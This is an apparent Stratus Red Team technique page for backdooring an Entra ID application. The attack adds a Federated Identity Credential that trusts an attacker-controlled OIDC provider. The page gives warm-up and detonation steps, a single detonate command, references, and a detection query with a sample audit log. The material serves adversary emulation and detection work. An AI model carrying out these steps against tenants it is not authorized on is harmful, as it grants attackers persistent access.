Backdoor Entra ID application with Federated Identity Credential (FIC)

Platform: Entra ID

Mappings

• MITRE ATT&CK
  • Persistence
• Privilege Escalation

Description

Backdoors an existing Entra ID application by creating a new Federated Identity Credential (FIC) that trusts an attacker-controlled OIDC provider.

Warm-up:

• Create a victim Entra ID application and associated service principal
• Assign it the Directory Readers role at the tenant level (for illustration purposes)
• Create an Azure Storage account to host the attacker-controlled OIDC provider metadata

Detonation:

• Generate a keypair to use for OIDC
• Upload OIDC discovery document and JWKS to the storage account
• Add a Federated Identity Credential (FIC) to the victim application that trusts tokens issued by the malicious OIDC provider
• Create a token signed by the attacker's OIDC private key to exchange for a token as the victim application
• Exchange the attacker's token for a Microsoft Graph token as the victim application using the FIC
• Display the victim application's access token to the user

References:

• https://dirkjanm.io/persisting-with-federated-credentials-entra-apps-managed-identities/
• https://github.com/azurekid/blackcat/pull/84/changes
• https://learn.microsoft.com/en-us/graph/api/resources/federatedidentitycredentials-overview
• https://hackingthe.cloud/aws/post_exploitation/iam_rogue_oidc_identity_provider/

Instructions

Detonate with Stratus Red Team

stratus detonate entra-id.persistence.backdoor-application-fic

Detection

Using Entra ID audit logs with the activity type Update application, where modifiedProperties contains FederatedIdentityCredentials.

Sample Entra ID audit log event to monitor:

{
  "category": "ApplicationManagement",
  "result": "success",
  "activityDisplayName": "Update application",
  "loggedByService": "Core Directory",
  "operationType": "Update",
  "targetResources": [
    {
      "id": "[REMOVED]",
      "displayName": "Stratus Red Team FIC application ly1h",
      "type": "Application",
      "userPrincipalName": null,
      "groupType": null,
      "modifiedProperties": [
        {
          "displayName": "FederatedIdentityCredentials",
          "oldValue": "[]",
          "newValue": "[{\"Name\":\"stratus-red-team-oidc-fic-ly1h\",\"Issuer\":\"https://stratusficapply1h.blob.core.windows.net/oidc\",\"Subject\":\"stratus-red-team-oidc\",\"Id\":\"[REMOVED]\",\"Description\":\"stratus-red-team-oidc-fic-ly1h\",\"Audiences\":[\"api://AzureADTokenExchange\"],\"ClaimsMatchingExpressionValue\":null,\"ClaimsMatchingExpressionLanguageVersion\":0,\"EncodingVersion\":2,\"TrustedIssuer\":null}]"
        },
        {
          "displayName": "Included Updated Properties",
          "oldValue": null,
          "newValue": "\"FederatedIdentityCredentials\""
        }
      ]
    }
  ]
}